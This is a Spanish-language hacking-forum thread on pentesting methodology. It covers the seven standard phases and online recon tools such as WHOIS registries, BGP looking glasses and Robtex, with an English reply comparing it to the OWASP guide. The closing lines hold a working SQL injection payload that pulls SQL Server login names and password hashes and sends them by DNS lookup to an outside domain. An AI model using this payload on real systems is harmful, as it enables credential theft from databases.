[WP] Pentesting

Iniciado por ANTRAX, Enero 25, 2017, 10:54:19 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.


El tema del día de hoy para debatir por WhatsApp es: Pentesting
Dejo este post para debatir acerca de este tema.

Saludos,
ANTRAX


Hola Comunidad. Voy a explicar mas bien poco de este tema que es larguisimo pero muy interesante para todos nosotros xD.
Me voy a centrar por lo menos ahora en la primeras fases del Pentesting que es footprinting y reconoissance en castellano (identificación y reconocimiento).
Primero voy a citar la metodologia de Pentesting y explicare la metadologia principal para mi de Pentest es
Ver link: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta Esta es el standart puro para mi de Pentest!.



El proceso estandar de Pentest son 7 etapas:
Las siguientes son las secciones principales definidas por la norma como base para la ejecución de las pruebas de penetración:

1)- Interacciones de pre-interacción
2)- La recogida de información
3)- Modelado de amenazas
4)- Análisis de Vulnerabilidad
5)- Explotación
6)- Post Explotación
7)- Informes

Para ver todo este estandar esta en en este link todas las tools y tecnicas de cada etapa en particular, leer obligatoriamente como la biblia jeje  ;D este link: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ahora les hablare de dos tools que sirven para el analis online del BGP,  Whois. Vamos a definir antes que es lo que llamamos a lo anterior:

Para footprinting externo, primero necesitamos determinar cuál de los servidores WHOIS contiene la información que buscamos. Dado que debemos conocer el TLD para el dominio de destino, simplemente tenemos que localizar al Registrador con el que está registrado el dominio de destino.
La información WHOIS se basa en una jerarquía arbórea. ICANN (IANA) es el registro autoritario para todos los TLD y es un gran punto de partida para todas las consultas WHOIS manuales.
Búsqueda de WHOIS
ICANN - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
IANA - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
NRO - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
AFRINIC - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
APNIC - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
ARIN - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
LACNIC - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
RIPE - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Una vez que se consultó al Registrador apropiado, podemos obtener la información del Registrante. Hay numerosos sitios que ofrecen información WHOIS; Sin embargo, para obtener mayor precisión en la documentación, debe usar sólo el Registrador adecuado.
InterNIC - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta No tienes permitido ver enlaces. Registrate o Entra a tu cuenta]
Looking glasses BGP
Es posible identificar el número de sistema autónomo (ASN) para las redes que participan en el protocolo de la entrada de la frontera (BGP). Desde BGP rutas de ruta se anuncian en todo el mundo podemos encontrar estos mediante el uso de un BGP4 y BGP6 espejo.
BGP4 - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
BPG6 - No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Las tools online que menciono ahora todos la debeis saber es Robtex y una web muy buena que tiene app para android y ios que es: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



Esta tambien muy buena la de esta ultima por que uno la visita y te aparece estos datos de tu conexion xD.

Welcome to the Hurricane Electric BGP Toolkit.

You are visiting from 192.168.0.1 Argentina

Announced as 192.168.0.0/23 (.....) Argentina

Your ISP is AS.... (.......)
He omitido mis datos obvio...
Una vez ahi se puede ver con graficos los datos del sistema autonomo o AS por el que estamos conectados y un whois a nuestro ISP }:)
Eso entre varios cosas mas que podes jugar xD.

La otra tool excelente online es Robtex link: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



Robtex es un excelente buscador de datos como DNS IPS y AS y rutas.
Espero que les haya gustado pero por poco tiempo no expondre mas. A menos que suene la hinchada under por otro post  ;D
Espero sus comentarios y saludos.
Rootkit_Pentester

Gpentest-standard is like owasp pentest guide... or another ...
for example in OWASP pentest guide you can see similar things like recon :)!





I mean, we can found a lot of 'ways' to execute a penetration testing well... will depends of the devices, area, deadline, risks, etc.

good job btw
1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--